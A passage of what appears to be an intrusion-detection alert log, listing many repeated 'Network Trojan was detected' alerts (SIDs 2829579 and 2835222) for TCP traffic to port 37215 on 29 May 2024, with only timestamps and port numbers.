                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.007555
                SID:2829579
                Source Port:44994
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.330655
                SID:2835222
                Source Port:55694
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.287232
                SID:2829579
                Source Port:46994
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.316418
                SID:2835222
                Source Port:45480
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.079169
                SID:2835222
                Source Port:40968
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.315750
                SID:2829579
                Source Port:59558
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.974315
                SID:2829579
                Source Port:42646
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.417162
                SID:2835222
                Source Port:32814
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.893408
                SID:2835222
                Source Port:44096
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.971915
                SID:2835222
                Source Port:51936
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.665956
                SID:2829579
                Source Port:33754
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.762860
                SID:2835222
                Source Port:46174
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.072582
                SID:2835222
                Source Port:49670
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.361812
                SID:2835222
                Source Port:47376
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.711911
                SID:2835222
                Source Port:43732
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.849333
                SID:2835222
                Source Port:55350
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.509210
                SID:2829579
                Source Port:40044
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.989832
                SID:2835222
                Source Port:45612
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.765135
                SID:2829579
                Source Port:56012
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.813481
                SID:2835222
                Source Port:37706
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.449793
                SID:2835222
                Source Port:42424
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.816811
                SID:2835222
                Source Port:48676
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.787118
                SID:2829579
                Source Port:38716
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.878058
                SID:2835222
                Source Port:60866
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.429458
                SID:2829579
                Source Port:55828
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.837163
                SID:2835222
                Source Port:40926
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.561712
                SID:2835222
                Source Port:56158
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.928296
                SID:2829579
                Source Port:39548
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.870070
                SID:2835222
                Source Port:50524
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.394755
                SID:2829579
                Source Port:57556
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.989696
                SID:2829579
                Source Port:43964
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.526197
                SID:2829579
                Source Port:46728
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.585309
                SID:2829579
                Source Port:35100
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.038074
                SID:2829579
                Source Port:34378
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.179438
                SID:2829579
                Source Port:56248
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.968700
                SID:2829579
                Source Port:35520
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.232526
                SID:2835222
                Source Port:47380
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.395864
                SID:2829579
                Source Port:60722
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.160974
                SID:2829579
                Source Port:54426
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.257189
                SID:2829579
                Source Port:48686
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.987108
                SID:2835222
                Source Port:51742
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.461342
                SID:2829579
                Source Port:44400
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.438545
                SID:2829579
                Source Port:60558
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.666686
                SID:2835222
                Source Port:49372
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.154982
                SID:2835222
                Source Port:35528
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.795062
                SID:2835222
                Source Port:50982
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.277028
                SID:2829579
                Source Port:36988
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.239447
                SID:2829579
                Source Port:33334
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.508621
                SID:2835222
                Source Port:44906
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.285556
                SID:2835222
                Source Port:46634
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.216845
                SID:2829579
                Source Port:45610
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.869676
                SID:2835222
                Source Port:59432
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.221229
                SID:2829579
                Source Port:49698
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.508601
                SID:2835222
                Source Port:50334
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.438610
                SID:2829579
                Source Port:48342
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.962710
                SID:2835222
                Source Port:41014
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.895599
                SID:2829579
                Source Port:46016
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.264781
                SID:2835222
                Source Port:34834
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.902924
                SID:2829579
                Source Port:35798
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.374742
                SID:2835222
                Source Port:48192
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.129254
                SID:2835222
                Source Port:34094
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.166455
                SID:2829579
                Source Port:57528
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.955469
                SID:2835222
                Source Port:60922
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.826808
                SID:2835222
                Source Port:35822
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.900168
                SID:2835222
                Source Port:56616
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.459414
                SID:2835222
                Source Port:60934
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.899536
                SID:2835222
                Source Port:41090
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.667216
                SID:2829579
                Source Port:39540
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.668088
                SID:2835222
                Source Port:34796
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.274455
                SID:2829579
                Source Port:57904
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.511478
                SID:2829579
                Source Port:53946
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.231362
                SID:2835222
                Source Port:60046
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.782155
                SID:2835222
                Source Port:36424
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.140696
                SID:2829579
                Source Port:54842
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.267538
                SID:2829579
                Source Port:57526
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.010473
                SID:2835222
                Source Port:58744
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.721910
                SID:2835222
                Source Port:37902
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.926605
                SID:2835222
                Source Port:49884
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.728701
                SID:2829579
                Source Port:42964
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.218060
                SID:2835222
                Source Port:35162
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.261537
                SID:2835222
                Source Port:46404
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.422390
                SID:2835222
                Source Port:60624
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.559151
                SID:2835222
                Source Port:59710
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.618018
                SID:2835222
                Source Port:43024
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.822843
                SID:2829579
                Source Port:44024
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.134482
                SID:2835222
                Source Port:38390
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.171697
                SID:2835222
                Source Port:58614
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.380828
                SID:2829579
                Source Port:49228
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.616359
                SID:2835222
                Source Port:49954
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.083129
                SID:2835222
                Source Port:42224
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.518229
                SID:2835222
                Source Port:45468
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.872950
                SID:2829579
                Source Port:38928
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.042925
                SID:2829579
                Source Port:57998
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.141949
                SID:2835222
                Source Port:50254
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.035123
                SID:2835222
                Source Port:51208
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.272313
                SID:2829579
                Source Port:41666
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.987066
                SID:2829579
                Source Port:56528
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.419251
                SID:2829579
                Source Port:38158
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.968494
                SID:2835222
                Source Port:36896
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.559060
                SID:2835222
                Source Port:48030
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.035243
                SID:2829579
                Source Port:55292
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.681927
                SID:2829579
                Source Port:38992
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.022393
                SID:2835222
                Source Port:51252
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.947166
                SID:2829579
                Source Port:43162
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.284263
                SID:2835222
                Source Port:54516
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.649702
                SID:2829579
                Source Port:41064
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.241412
                SID:2835222
                Source Port:51948
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.928922
                SID:2835222
                Source Port:59526
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.853168
                SID:2829579
                Source Port:39174
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.319331
                SID:2835222
                Source Port:54220
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.535293
                SID:2829579
                Source Port:36686
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.074576
                SID:2829579
                Source Port:49600
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.669408
                SID:2835222
                Source Port:59860
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.557170
                SID:2829579
                Source Port:48414
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.474971
                SID:2829579
                Source Port:51006
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.162428
                SID:2829579
                Source Port:58092
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.433961
                SID:2829579
                Source Port:60818
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.429619
                SID:2835222
                Source Port:53000
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.934906
                SID:2829579
                Source Port:41264
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.638924
                SID:2829579
                Source Port:46076
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.023210
                SID:2829579
                Source Port:38480
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.286535
                SID:2829579
                Source Port:36818
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.787739
                SID:2829579
                Source Port:52394
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.231529
                SID:2829579
                Source Port:35788
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.977750
                SID:2829579
                Source Port:49352
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.072317
                SID:2829579
                Source Port:47142
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.325795
                SID:2835222
                Source Port:42624
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.417892
                SID:2829579
                Source Port:45404
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.290384
                SID:2835222
                Source Port:58264
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.265778
                SID:2829579
                Source Port:52528
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.220775
                SID:2835222
                Source Port:37776
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.279255
                SID:2829579
                Source Port:36820
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.929151
                SID:2835222
                Source Port:60982
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.512062
                SID:2829579
                Source Port:45686
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.730592
                SID:2829579
                Source Port:33082
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.522030
                SID:2829579
                Source Port:51576
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.066641
                SID:2829579
                Source Port:48748
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.613045
                SID:2829579
                Source Port:55296
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.654192
                SID:2829579
                Source Port:37406
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.927672
                SID:2829579
                Source Port:53988
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.913889
                SID:2835222
                Source Port:42624
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.538099
                SID:2835222
                Source Port:43408
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.681999
                SID:2829579
                Source Port:41750
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.176198
                SID:2835222
                Source Port:48992
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.007669
                SID:2829579
                Source Port:56980
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.121328
                SID:2835222
                Source Port:50776
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.640632
                SID:2835222
                Source Port:48332
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.289895
                SID:2835222
                Source Port:54046
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.568511
                SID:2829579
                Source Port:57736
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.135915
                SID:2835222
                Source Port:59628
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.727062
                SID:2829579
                Source Port:55568
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.807445
                SID:2829579
                Source Port:35922
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.763451
                SID:2829579
                Source Port:56260
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.125146
                SID:2829579
                Source Port:52938
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.918311
                SID:2835222
                Source Port:48808
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.231563
                SID:2835222
                Source Port:56614
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.287157
                SID:2835222
                Source Port:33156
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.669013
                SID:2835222
                Source Port:59808
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.987196
                SID:2829579
                Source Port:54170
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.890091
                SID:2829579
                Source Port:49410
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.176862
                SID:2829579
                Source Port:47262
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.225244
                SID:2829579
                Source Port:37668
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.869315
                SID:2829579
                Source Port:59764
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.721089
                SID:2829579
                Source Port:53310
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.506378
                SID:2835222
                Source Port:51446
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.174890
                SID:2835222
                Source Port:50970
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.044859
                SID:2829579
                Source Port:39336
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.771219
                SID:2835222
                Source Port:51470
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.820481
                SID:2829579
                Source Port:49090
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.982212
                SID:2829579
                Source Port:58692
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.713665
                SID:2829579
                Source Port:37340
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.263831
                SID:2835222
                Source Port:42416
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.432541
                SID:2829579
                Source Port:55924
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.652858
                SID:2829579
                Source Port:59314
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.887433
                SID:2835222
                Source Port:44050
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.564822
                SID:2835222
                Source Port:49258
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.725999
                SID:2835222
                Source Port:33220
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.796092
                SID:2835222
                Source Port:55690
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.208830
                SID:2835222
                Source Port:33658
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.683760
                SID:2829579
                Source Port:33980
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.783532
                SID:2829579
                Source Port:40638
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.134567
                SID:2829579
                Source Port:43760
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.440641
                SID:2829579
                Source Port:46220
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.273785
                SID:2835222
                Source Port:55568
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.583806
                SID:2835222
                Source Port:38436
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.574313
                SID:2829579
                Source Port:43908
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.238966
                SID:2835222
                Source Port:34700
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.681615
                SID:2835222
                Source Port:47920
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.945496
                SID:2829579
                Source Port:46336
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.897063
                SID:2829579
                Source Port:32852
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.811425
                SID:2829579
                Source Port:60098
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.531957
                SID:2829579
                Source Port:52884
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.789225
                SID:2829579
                Source Port:41332
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.969700
                SID:2829579
                Source Port:55318
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.971693
                SID:2835222
                Source Port:46208
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.025168
                SID:2829579
                Source Port:50404
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.819691
                SID:2835222
                Source Port:40430
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
